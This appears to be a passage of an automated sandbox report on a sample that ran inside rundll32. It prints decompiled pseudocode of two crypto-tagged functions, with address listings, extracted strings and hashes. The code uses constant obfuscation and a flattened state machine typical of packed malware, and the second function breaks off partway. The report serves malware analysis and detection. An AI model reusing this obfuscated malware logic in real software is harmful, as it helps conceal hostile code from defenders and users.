Opcode Fuzzy Hash: 02f93e4b8124e57df4880740d4322ec26d27821492375eaa35625f02d4657220
Instruction Fuzzy Hash: 1982FFB1508381CFD378CF25C94AB8BBBE1BBD4714F108A2DE5D996260D7B58949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 007ABB7E Relevance: 23.1, Strings: 18, Instructions: 637
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E007ABB7E(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				void* _t690;
				void* _t691;
				void* _t697;
				void* _t700;
				void* _t701;
				void* _t704;
				void* _t710;
				char _t711;
				void* _t713;
				void* _t717;
				void* _t719;
				void* _t725;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				void* _t747;
				void* _t763;
				void* _t772;
				void* _t819;
				intOrPtr _t834;
				void* _t840;
				void* _t842;
				void* _t846;
				void* _t847;
				void* _t850;

				_v92 = 0xf68129;
				_v100 = __ecx;
				asm("stosd");
				_t732 = 0x6b;
				asm("stosd");
				_t846 = 0;
				_t725 = 0x7252bf3;
				asm("stosd");
				_v136 = 0x5ab987;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 ^ 0x0f97e334;
				_v240 = 0x5f59f0;
				_v240 = _v240 << 5;
				_v240 = _v240 * 0x46;
				_v240 = _v240 ^ 0x4252f400;
				_v320 = 0x63212;
				_v320 = _v320 + 0xffffd9b7;
				_v320 = _v320 * 0x26;
				_v320 = _v320 + 0xffff4af1;
				_v320 = _v320 ^ 0x00e50ac7;
				_v192 = 0x354250;
				_t26 =  &_v192; // 0x354250
				_v192 =  *_t26 * 0x43;
				_v192 = _v192 ^ 0x0df05af0;
				_v308 = 0x42c709;
				_v308 = _v308 | 0x3400f9ef;
				_v308 = _v308 << 3;
				_v308 = _v308 + 0x3df1;
				_v308 = _v308 ^ 0xa2183d69;
				_v152 = 0x5369e0;
				_v152 = _v152 ^ 0xff6c3c62;
				_v152 = _v152 ^ 0xff3f5582;
				_v276 = 0x14bd80;
				_v276 = _v276 << 5;
				_v276 = _v276 ^ 0x5f90d5fe;
				_v276 = _v276 / _t732;
				_v276 = _v276 ^ 0x00de92e5;
				_v164 = 0xc6025f;
				_t733 = 0x77;
				_v164 = _v164 / _t733;
				_v164 = _v164 ^ 0x0001a9f8;
				_v196 = 0xc87c9f;
				_v196 = _v196 + 0x15df;
				_v196 = _v196 ^ 0x00c8927e;
				_v316 = 0xe66987;
				_v316 = _v316 ^ 0x1b2582a6;
				_t734 = 0x3b;
				_v316 = _v316 * 0x5b;
				_v316 = _v316 + 0x2fb1;
				_v316 = _v316 ^ 0xdea4c46c;
				_v224 = 0xfe0ac2;
				_v224 = _v224 + 0xfffff1ae;
				_v224 = _v224 ^ 0x9ea75b7a;
				_v224 = _v224 ^ 0x9e5aa70a;
				_v272 = 0x969b46;
				_v272 = _v272 / _t734;
				_t735 = 0x5e;
				_v272 = _v272 / _t735;
				_v272 = _v272 ^ 0xefd30b8f;
				_v272 = _v272 ^ 0xefd30d7c;
				_v376 = 0x150d1;
				_v376 = _v376 + 0xf180;
				_v376 = _v376 ^ 0x94f4a204;
				_v376 = _v376 + 0xffff1e44;
				_v376 = _v376 ^ 0x94f362d9;
				_v156 = 0xee57c3;
				_v156 = _v156 >> 1;
				_v156 = _v156 ^ 0x00740491;
				_v212 = 0xc602fd;
				_v212 = _v212 + 0x6a76;
				_v212 = _v212 + 0x1c99;
				_v212 = _v212 ^ 0x00ce641d;
				_v268 = 0xce4877;
				_v268 = _v268 ^ 0x1d22fca4;
				_v268 = _v268 | 0x3421cf88;
				_v268 = _v268 ^ 0x3de53c3b;
				_v124 = 0x747c03;
				_v124 = _v124 + 0xffffbae7;
				_v124 = _v124 ^ 0x007459dd;
				_v236 = 0x1c09ef;
				_t736 = 0x7d;
				_v236 = _v236 * 0x24;
				_v236 = _v236 >> 5;
				_v236 = _v236 ^ 0x00154586;
				_v248 = 0xce2f;
				_v248 = _v248 / _t736;
				_v248 = _v248 ^ 0x54fb24c5;
				_v248 = _v248 ^ 0x54f69380;
				_v368 = 0xa2f216;
				_v368 = _v368 ^ 0x77671628;
				_v368 = _v368 + 0xffffb776;
				_t737 = 0x12;
				_v368 = _v368 * 0x54;
				_v368 = _v368 ^ 0x4cdde93a;
				_v256 = 0x7ecaf1;
				_v256 = _v256 + 0xffff3fac;
				_v256 = _v256 >> 1;
				_v256 = _v256 ^ 0x003aef01;
				_v352 = 0xabf876;
				_v352 = _v352 >> 0xb;
				_v352 = _v352 + 0xffff46d6;
				_v352 = _v352 + 0x2c0c;
				_v352 = _v352 ^ 0xfff246b3;
				_v360 = 0x97ba77;
				_v360 = _v360 ^ 0x3e0377f3;
				_v360 = _v360 >> 0xd;
				_v360 = _v360 / _t737;
				_v360 = _v360 ^ 0x00060934;
				_v336 = 0x8ce7a6;
				_t738 = 0x2f;
				_v336 = _v336 / _t738;
				_v336 = _v336 + 0xffff2624;
				_v336 = _v336 | 0x278756f7;
				_v336 = _v336 ^ 0x278bbfdd;
				_v344 = 0xbf551b;
				_v344 = _v344 * 0x3a;
				_v344 = _v344 ^ 0x84c4554b;
				_v344 = _v344 << 0xf;
				_v344 = _v344 ^ 0x8ea60236;
				_v200 = 0x4381fe;
				_v200 = _v200 | 0xd1728d79;
				_v200 = _v200 ^ 0xd172d7b5;
				_v304 = 0x80f198;
				_t739 = 0x31;
				_v304 = _v304 * 0x64;
				_v304 = _v304 << 0xe;
				_v304 = _v304 + 0xffff9e99;
				_v304 = _v304 ^ 0x97d19a3f;
				_v312 = 0x373eb5;
				_v312 = _v312 / _t739;
				_v312 = _v312 >> 9;
				_v312 = _v312 ^ 0x9e5751db;
				_v312 = _v312 ^ 0x9e5d4ba0;
				_v188 = 0xb51e1e;
				_t740 = 0x6d;
				_v188 = _v188 * 0x30;
				_v188 = _v188 ^ 0x21f969de;
				_v128 = 0x6dafe5;
				_v128 = _v128 + 0xdb72;
				_v128 = _v128 ^ 0x00632f59;
				_v348 = 0xf775fc;
				_v348 = _v348 * 0x7b;
				_v348 = _v348 | 0xe77e6c6c;
				_v348 = _v348 + 0xffff92b3;
				_v348 = _v348 ^ 0xf7fd41f8;
				_v292 = 0x49707d;
				_v292 = _v292 + 0xffffa330;
				_v292 = _v292 + 0x378d;
				_v292 = _v292 ^ 0x2a616ae7;
				_v292 = _v292 ^ 0x2a2200cf;
				_v148 = 0xe2ca7f;
				_v148 = _v148 + 0x2800;
				_v148 = _v148 ^ 0x00ec4a73;
				_v180 = 0x28ed65;
				_t276 =  &_v180; // 0x28ed65
				_v180 =  *_t276 / _t740;
				_v180 = _v180 ^ 0x0008a356;
				_v340 = 0xb04f06;
				_v340 = _v340 | 0x19ae51aa;
				_v340 = _v340 + 0xffff0ab2;
				_v340 = _v340 >> 7;
				_v340 = _v340 ^ 0x003d7bf7;
				_v252 = 0x779412;
				_t741 = 0x28;
				_v252 = _v252 / _t741;
				_v252 = _v252 | 0x065d8c29;
				_v252 = _v252 ^ 0x0653787d;
				_v140 = 0x2cf99d;
				_v140 = _v140 << 0xf;
				_v140 = _v140 ^ 0x7ccdbf9f;
				_v300 = 0xa5c7e2;
				_v300 = _v300 ^ 0xf64f2b87;
				_v300 = _v300 | 0xd6032566;
				_v300 = _v300 << 7;
				_v300 = _v300 ^ 0x75f4cdbc;
				_v204 = 0xc71fe4;
				_v204 = _v204 ^ 0x39f608ad;
				_v204 = _v204 ^ 0x39346367;
				_v332 = 0x26340b;
				_t742 = 0xc;
				_v332 = _v332 / _t742;
				_v332 = _v332 >> 0xc;
				_v332 = _v332 + 0x4006;
				_v332 = _v332 ^ 0x00056ca9;
				_v244 = 0xb4bdd0;
				_v244 = _v244 ^ 0x9dcc8204;
				_t743 = 0x5c;
				_v244 = _v244 * 0x56;
				_v244 = _v244 ^ 0xe668140d;
				_v228 = 0xb7abf;
				_v228 = _v228 ^ 0x8d46dccd;
				_v228 = _v228 / _t743;
				_v228 = _v228 ^ 0x0183fb21;
				_v132 = 0x744574;
				_t744 = 0x2d;
				_v132 = _v132 * 0x27;
				_v132 = _v132 ^ 0x11b9ba9e;
				_v384 = 0x4471dc;
				_v384 = _v384 ^ 0x8273491f;
				_v384 = _v384 / _t744;
				_v384 = _v384 + 0xffffe0da;
				_v384 = _v384 ^ 0x02e26e3a;
				_v324 = 0x605f40;
				_v324 = _v324 + 0xffffce94;
				_v324 = _v324 + 0xffff95c1;
				_v324 = _v324 >> 6;
				_v324 = _v324 ^ 0x0001f278;
				_v380 = 0xfa4dc1;
				_t745 = 0x17;
				_v380 = _v380 * 0x71;
				_v380 = _v380 ^ 0x12ce666f;
				_v380 = _v380 | 0xc76ff931;
				_v380 = _v380 ^ 0xfff34e85;
				_v172 = 0xf73d33;
				_v172 = _v172 >> 7;
				_v172 = _v172 ^ 0x0001a374;
				_v364 = 0xb38f71;
				_v364 = _v364 + 0x4143;
				_v364 = _v364 ^ 0x53c53aac;
				_v364 = _v364 / _t745;
				_v364 = _v364 ^ 0x03acc109;
				_v260 = 0xa91f99;
				_v260 = _v260 >> 0xa;
				_v260 = _v260 ^ 0xc9224c65;
				_v260 = _v260 ^ 0xc926367a;
				_v284 = 0x5ea8fe;
				_v284 = _v284 * 0x3e;
				_v284 = _v284 | 0x757fbe3f;
				_v284 = _v284 ^ 0x77fedad5;
				_v264 = 0xc1651a;
				_v264 = _v264 / _t745;
				_v264 = _v264 + 0x650c;
				_v264 = _v264 ^ 0x00066731;
				_v372 = 0xd53751;
				_v372 = _v372 >> 0x10;
				_v372 = _v372 * 0x50;
				_v372 = _v372 ^ 0xc5a53504;
				_v372 = _v372 ^ 0xc5a85656;
				_v220 = 0x28743;
				_v220 = _v220 | 0x747e4fe0;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x0078aec3;
				_v356 = 0x673303;
				_v356 = _v356 + 0xffff3afb;
				_v356 = _v356 >> 2;
				_t746 = 0x76;
				_t842 = 0x6cd454e;
				_v96 = 0x100;
				_t840 = 0xcf5796f;
				_v356 = _v356 * 9;
				_v356 = _v356 ^ 0x00e12344;
				_v232 = 0xe5489f;
				_v232 = _v232 * 0x62;
				_v232 = _v232 ^ 0x422e6763;
				_v232 = _v232 ^ 0x15e3beef;
				_v144 = 0x9d1c0d;
				_v144 = _v144 | 0x5a9db401;
				_v144 = _v144 ^ 0x5a9ceaa6;
				_v328 = 0xaba5b0;
				_v328 = _v328 + 0xfc55;
				_v328 = _v328 * 0x37;
				_v328 = _v328 * 0x78;
				_v328 = _v328 ^ 0x62b938e2;
				_v168 = 0x51360e;
				_v168 = _v168 << 2;
				_v168 = _v168 ^ 0x014a45e2;
				_v176 = 0x11fbeb;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x47e89d0f;
				_v216 = 0x8fcc87;
				_v216 = _v216 / _t746;
				_v216 = _v216 ^ 0xd2cd5e41;
				_v216 = _v216 ^ 0xd2c9cc36;
				_v184 = 0x8a666a;
				_v184 = _v184 * 0x6c;
				_v184 = _v184 ^ 0x3a66624b;
				_v288 = 0x12fc4d;
				_v288 = _v288 ^ 0x84b68421;
				_v288 = _v288 * 0x77;
				_v288 = _v288 ^ 0xa87aad10;
				_v296 = 0xb3f337;
				_v296 = _v296 >> 1;
				_v296 = _v296 + 0xffffa2d0;
				_v296 = _v296 + 0xffff98aa;
				_v296 = _v296 ^ 0x0050e375;
				_v160 = 0xa98b94;
				_v160 = _v160 ^ 0x93f8baf3;
				_v160 = _v160 ^ 0x935506dc;
				_v208 = 0xd26eef;
				_v208 = _v208 + 0xffff657d;
				_v208 = _v208 << 5;
				_v208 = _v208 ^ 0x1a3ecca6;
				_v280 = 0xce1cc4;
				_v280 = _v280 << 6;
				_v280 = _v280 << 0x10;
				_v280 = _v280 | 0xb3a7eb9b;
				_v280 = _v280 ^ 0xb3a418cd;
				while(1) {
					L1:
					_t747 = 0xb34e23f;
					while(1) {
						L2:
						while(1) {
							L3:
							_t690 = 0xa0b11f8;
							do {
								while(1) {
									L4:
									_t850 = _t725 - _t690;
									if(_t850 > 0) {
										break;
									}
									if(_t850 == 0) {
										_t700 = E007B4624(_v224, _v108, _v232, _v144,  &_v112, _v328, _v120);
										_t847 = _t847 + 0x14;
										__eflags = _t700;
										_t747 = 0xb34e23f;
										_t725 =  ==  ? 0xb34e23f : 0xcc5fcc9;
										goto L2;
									} else {
										if(_t725 == 0x24fa5ba) {
											_push(_v212);
											_push(_v156);
											_t701 = E007BDCF7(_v376, 0x7a1984, __eflags);
											_push(_v236);
											_push(_v124);
											_t704 = E007A9462(_t701, _v368,  &_v116, E007BDCF7(_v268, 0x7a1814, __eflags), _v256, _v136);
											_t847 = _t847 + 0x24;
											__eflags = _t704 - _v240;
											_t725 =  ==  ? 0xec78b05 : 0xc75135f;
											E007AA8B0(_v352, _t701, _v360);
											E007AA8B0(_v336, _t702, _v344);
											_t840 = 0xcf5796f;
											goto L13;
										} else {
											if(_t725 == 0x505fe8e) {
												_t631 =  &_v208; // 0x39346367
												E007A957D(_v116, _v160,  *_t631, _v272, _v280);
											} else {
												if(_t725 == _t842) {
													_push(_v340);
													_push(_v180);
													_t710 = E007BDCF7(_v148, 0x7a1854, __eflags);
													_pop(_t763);
													_t844 = _t710;
													_t711 = 0x48;
													_v104 = _t711;
													_t713 = E007A1C45(_v120,  &_v104,  &_v76, _v252, _v140, _v300, _v204, _t710, _v332, _v276, _t763, _t711);
													_t847 = _t847 + 0x28;
													__eflags = _t713 - _v164;
													if(_t713 != _v164) {
														_t725 = _t840;
													} else {
														_t834 =  *0x7c3dfc; // 0x0
														E007AED7E(_v244, _t834, _v228,  &_v68, 0x40);
														_t847 = _t847 + 0xc;
														_t725 = 0x9bcfe4f;
													}
													E007AA8B0(_v132, _t844, _v384);
													goto L13;
												} else {
													if(_t725 == 0x7252bf3) {
														_t725 = 0x24fa5ba;
														continue;
													} else {
														if(_t725 == _t819) {
															_t717 = E007AB144(_v120, _v188, _v308, _v128, _v348, _v292);
															_t847 = _t847 + 0x10;
															__eflags = _t717 - _v152;
															_t725 =  ==  ? _t842 : _t840;
															while(1) {
																L1:
																_t747 = 0xb34e23f;
																L2:
																L3:
																_t690 = 0xa0b11f8;
																goto L4;
															}
														} else {
															_t856 = _t725 - 0x9bcfe4f;
															if(_t725 == 0x9bcfe4f) {
																_push(_v172);
																_push(_v380);
																_t719 = E007BDCF7(_v324, 0x7a1854, _t856);
																_pop(_t772);
																E007AAA4D(_v364, _t719,  *((intOrPtr*)(_v100 + 4)), _v284, _v196, _v116,  &_v108, _v264, _t772,  *_v100, _v372);
																_t725 =  ==  ? 0xa0b11f8 : _t840;
																E007AA8B0(_v220, _t719, _v356);
																_t847 = _t847 + 0x2c;
																L13:
																_t842 = 0x6cd454e;
																L32:
																_t819 = 0x9b01f0f;
																_t747 = 0xb34e23f;
																_t690 = 0xa0b11f8;
															}
															goto L33;
														}
													}
												}
											}
										}
									}
									L36:
									return _t846;
								}
								__eflags = _t725 - _t747;
								if(_t725 == _t747) {
									_t691 = E007A2BD9(_v112);
									_t725 = 0xb500bcf;
									__eflags = _t691;
									_t846 =  !=  ? 1 : _t846;
									goto L32;
								} else {
									__eflags = _t725 - 0xb500bcf;
									if(_t725 == 0xb500bcf) {
										E007BCA69(_v112, _v168, _v176);
										_t725 = 0xcc5fcc9;
										goto L1;
									} else {
										__eflags = _t725 - 0xcc5fcc9;
										if(_t725 == 0xcc5fcc9) {
											E007AA958(_v216, _v108, _v184);
											_t725 = _t840;
											while(1) {
												L1:
												_t747 = 0xb34e23f;
												goto L2;
											}
										} else {
											__eflags = _t725 - _t840;
											if(_t725 == _t840) {
												E007AA958(_v288, _v120, _v296);
												_t725 = 0x505fe8e;
												while(1) {
													L1:
													_t747 = 0xb34e23f;
													goto L2;
												}
											} else {
												__eflags = _t725 - 0xec78b05;
												if(__eflags != 0) {
													goto L33;
												} else {
													_v104 = _v96;
													_t697 = E007A92C7(_v200, _v96, _v304, _v312,  &_v120, _v116, _v320);
													_t847 = _t847 + 0x14;
													__eflags = _t697 - _v192;
													_t819 = 0x9b01f0f;
													_t747 = 0xb34e23f;
													_t725 =  ==  ? 0x9b01f0f : 0x505fe8e;
													goto L3;
												}
											}
										}
									}
								}
								goto L36;
								L33:
							} while (_t725 != 0xc75135f);
							goto L36;
						}
					}
				}
			}

0x007abb84
0x007abb9c
0x007abba3
0x007abba8
0x007abbab
0x007abbac
0x007abbae
0x007abbb3
0x007abbb4
0x007abbc7
0x007abbce
0x007abbd9
0x007abbe4
0x007abbf4
0x007abbfb
0x007abc06
0x007abc0e
0x007abc1b
0x007abc1f
0x007abc27
0x007abc2f
0x007abc3a
0x007abc42
0x007abc49
0x007abc54
0x007abc5c
0x007abc64
0x007abc69
0x007abc71
0x007abc79
0x007abc84
0x007abc8f
0x007abc9a
0x007abca5
0x007abcad
0x007abcc3
0x007abcca
0x007abcd5
0x007abce7
0x007abcec
0x007abcf5
0x007abd00
0x007abd0b
0x007abd16
0x007abd21
0x007abd29
0x007abd36
0x007abd39
0x007abd3d
0x007abd45
0x007abd4d
0x007abd58
0x007abd63
0x007abd6e
0x007abd79
0x007abd8f
0x007abd9d
0x007abda2
0x007abdab
0x007abdb6
0x007abdc1
0x007abdc9
0x007abdd1
0x007abdd9
0x007abde1
0x007abde9
0x007abdf4
0x007abdfb
0x007abe06
0x007abe11
0x007abe1c
0x007abe27
0x007abe32
0x007abe3d
0x007abe48
0x007abe53
0x007abe5e
0x007abe69
0x007abe74
0x007abe7f
0x007abe92
0x007abe95
0x007abe9c
0x007abea4
0x007abeaf
0x007abec5
0x007abecc
0x007abed7
0x007abee2
0x007abeea
0x007abef2
0x007abeff
0x007abf02
0x007abf06
0x007abf0e
0x007abf19
0x007abf24
0x007abf2b
0x007abf36
0x007abf3e
0x007abf43
0x007abf4b
0x007abf53
0x007abf5b
0x007abf63
0x007abf6b
0x007abf78
0x007abf7c
0x007abf84
0x007abf90
0x007abf93
0x007abf97
0x007abf9f
0x007abfa7
0x007abfaf
0x007abfbc
0x007abfc0
0x007abfc8
0x007abfcd
0x007abfd5
0x007abfe0
0x007abfeb
0x007abff8
0x007ac007
0x007ac00a
0x007ac00e
0x007ac013
0x007ac01b
0x007ac023
0x007ac033
0x007ac037
0x007ac03c
0x007ac044
0x007ac04c
0x007ac05f
0x007ac062
0x007ac069
0x007ac074
0x007ac07f
0x007ac08a
0x007ac095
0x007ac0a2
0x007ac0a6
0x007ac0ae
0x007ac0b6
0x007ac0be
0x007ac0c6
0x007ac0ce
0x007ac0d6
0x007ac0de
0x007ac0e6
0x007ac0f1
0x007ac0fc
0x007ac107
0x007ac112
0x007ac11d
0x007ac124
0x007ac12f
0x007ac137
0x007ac13f
0x007ac147
0x007ac14c
0x007ac154
0x007ac166
0x007ac16b
0x007ac174
0x007ac17f
0x007ac18a
0x007ac195
0x007ac19d
0x007ac1a8
0x007ac1b0
0x007ac1b8
0x007ac1c0
0x007ac1c5
0x007ac1cd
0x007ac1d8
0x007ac1e3
0x007ac1ee
0x007ac1fa
0x007ac1fd
0x007ac201
0x007ac206
0x007ac20e
0x007ac216
0x007ac223
0x007ac238
0x007ac23b
0x007ac242
0x007ac24d
0x007ac258
0x007ac26e
0x007ac275
0x007ac280
0x007ac293
0x007ac296
0x007ac29d
0x007ac2a8
0x007ac2b0
0x007ac2c0
0x007ac2c4
0x007ac2cc
0x007ac2d4
0x007ac2dc
0x007ac2e4
0x007ac2ec
0x007ac2f1
0x007ac2f9
0x007ac306
0x007ac307
0x007ac30b
0x007ac313
0x007ac31b
0x007ac323
0x007ac32e
0x007ac336
0x007ac341
0x007ac349
0x007ac351
0x007ac361
0x007ac365
0x007ac36d
0x007ac378
0x007ac380
0x007ac38b
0x007ac396
0x007ac3a3
0x007ac3a7
0x007ac3af
0x007ac3b7
0x007ac3cb
0x007ac3d2
0x007ac3dd
0x007ac3e8
0x007ac3f0
0x007ac3fa
0x007ac3fe
0x007ac406
0x007ac40e
0x007ac419
0x007ac424
0x007ac42c
0x007ac437
0x007ac43f
0x007ac447
0x007ac455
0x007ac456
0x007ac45b
0x007ac466
0x007ac46b
0x007ac46f
0x007ac477
0x007ac48a
0x007ac491
0x007ac49c
0x007ac4a7
0x007ac4b2
0x007ac4bd
0x007ac4c8
0x007ac4d0
0x007ac4dd
0x007ac4e6
0x007ac4ea
0x007ac4f2
0x007ac4fd
0x007ac505
0x007ac510
0x007ac51b
0x007ac523
0x007ac52e
0x007ac542
0x007ac549
0x007ac554
0x007ac55f
0x007ac572
0x007ac579
0x007ac584
0x007ac594
0x007ac5a1
0x007ac5a5
0x007ac5ad
0x007ac5b5
0x007ac5b9
0x007ac5c1
0x007ac5c9
0x007ac5d1
0x007ac5dc
0x007ac5e7
0x007ac5f2
0x007ac5fd
0x007ac608
0x007ac610
0x007ac61b
0x007ac623
0x007ac628
0x007ac62d
0x007ac635
0x007ac63d
0x007ac63d
0x007ac63d
0x007ac642
0x007ac642
0x007ac647
0x007ac647
0x007ac647
0x007ac64c
0x007ac64c
0x007ac64c
0x007ac64c
0x007ac64e
0x00000000
0x00000000
0x007ac654
0x007ac917
0x007ac91c
0x007ac924
0x007ac926
0x007ac92b
0x00000000
0x007ac65a
0x007ac660
0x007ac83b
0x007ac847
0x007ac852
0x007ac857
0x007ac865
0x007ac89e
0x007ac8a5
0x007ac8b4
0x007ac8c5
0x007ac8c8
0x007ac8d8
0x007ac8de
0x00000000
0x007ac666
0x007ac66c
0x007aca66
0x007aca7b
0x007ac672
0x007ac674
0x007ac779
0x007ac782
0x007ac790
0x007ac796
0x007ac799
0x007ac7a2
0x007ac7ac
0x007ac7e3
0x007ac7e8
0x007ac7eb
0x007ac7f2
0x007ac821
0x007ac7f4
0x007ac805
0x007ac812
0x007ac817
0x007ac81a
0x007ac81a
0x007ac830
0x00000000
0x007ac67a
0x007ac680
0x007ac76f
0x00000000
0x007ac686
0x007ac688
0x007ac752
0x007ac759
0x007ac765
0x007ac767
0x007ac63d
0x007ac63d
0x007ac63d
0x007ac642
0x007ac647
0x007ac647
0x00000000
0x007ac647
0x007ac68e
0x007ac68e
0x007ac694
0x007ac69a
0x007ac6a6
0x007ac6ae
0x007ac6b4
0x007ac6f8
0x007ac71c
0x007ac71f
0x007ac724
0x007ac727
0x007ac727
0x007aca3e
0x007aca3e
0x007aca43
0x007aca48
0x007aca48
0x00000000
0x007ac694
0x007ac688
0x007ac680
0x007ac674
0x007ac66c
0x007ac660
0x007aca85
0x007aca8f
0x007aca8f
0x007ac933
0x007ac935
0x007aca2c
0x007aca33
0x007aca39
0x007aca3b
0x00000000
0x007ac93b
0x007ac93b
0x007ac941
0x007aca15
0x007aca1b
0x00000000
0x007ac947
0x007ac947
0x007ac94d
0x007ac9f3
0x007ac9f9
0x007ac63d
0x007ac63d
0x007ac63d
0x00000000
0x007ac63d
0x007ac953
0x007ac953
0x007ac955
0x007ac9ce
0x007ac9d4
0x007ac63d
0x007ac63d
0x007ac63d
0x00000000
0x007ac63d
0x007ac957
0x007ac957
0x007ac95d
0x00000000
0x007ac963
0x007ac97c
0x007ac995
0x007ac99c
0x007ac9ab
0x007ac9ad
0x007ac9b2
0x007ac9b7
0x00000000
0x007ac9b7
0x007ac95d
0x007ac955
0x007ac94d
0x007ac941
0x00000000
0x007aca4d
0x007aca4d
0x00000000
0x007aca59
0x007ac647
0x007ac642

Strings

PB5, xrefs: 007ABC3A
;<=, xrefs: 007ABE53
O~t, xrefs: 007AC419
CA, xrefs: 007AC349
ll~, xrefs: 007AC0A6
iS, xrefs: 007ABC79
e(, xrefs: 007AC112
gc49, xrefs: 007ACA66
tEt, xrefs: 007AC280
@_`, xrefs: 007AC2D4
sJ, xrefs: 007AC0FC
vj, xrefs: 007ABE11
uP, xrefs: 007AC5C9
D#, xrefs: 007AC46F
Kbf:, xrefs: 007AC579
cg.B, xrefs: 007AC491
Y/c, xrefs: 007AC08A
ja*, xrefs: 007AC0D6

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ;<=$@_`$CA$D#$Kbf:$PB5$Y/c$cg.B$e($gc49$ll~$sJ$tEt$uP$vj$O~t$iS$ja*
API String ID: 0-258179307
Opcode ID: 632dcaf2f828a5cefd7d96514b60057cc95180ace2e5504aa47e9f376864a539
Instruction ID: a3cd3325bd52fe3b74f882ee874dc20fc45b34bd2e008662eaffae74144a4291
Opcode Fuzzy Hash: 632dcaf2f828a5cefd7d96514b60057cc95180ace2e5504aa47e9f376864a539
Instruction Fuzzy Hash: 2E72F0B1509381DFD379CF25C58AA9BBBE2BBC5304F10891DE6DA86260D7B58949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 007B4B87 Relevance: 21.9, Strings: 17, Instructions: 604
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E007B4B87(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				intOrPtr _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				void* _t703;
				void* _t707;
				signed int _t708;
				signed int _t717;
				void* _t730;
				void* _t736;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				void* _t758;
				signed int _t798;
				void* _t803;
				void* _t804;
				void* _t811;

				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0xa2c333;
				_v2612 = 0xd97943;
				_v2696 = 0x74b91;
				_v2696 = _v2696 + 0xffffab65;
				_v2696 = _v2696 ^ 0x0006f6df;
				_v2804 = 0x130b03;
				_v2804 = _v2804 << 9;
				_v2804 = _v2804 + 0x8374;
				_v2804 = _v2804 ^ 0x26068974;
				_v2876 = 0x240a80;
				_v2876 = _v2876 >> 6;
				_v2876 = _v2876 >> 5;
				_v2876 = _v2876 ^ 0x3e269fec;
				_v2876 = _v2876 ^ 0x3e253447;
				_v2924 = 0x49db5b;
				_v2924 = _v2924 + 0xd552;
				_t803 = __ecx;
				_t798 = 0xce4571;
				_t738 = 0x27;
				_v2924 = _v2924 / _t738;
				_v2924 = _v2924 + 0x3019;
				_v2924 = _v2924 ^ 0x0006d24f;
				_v2796 = 0xf8ea63;
				_v2796 = _v2796 << 3;
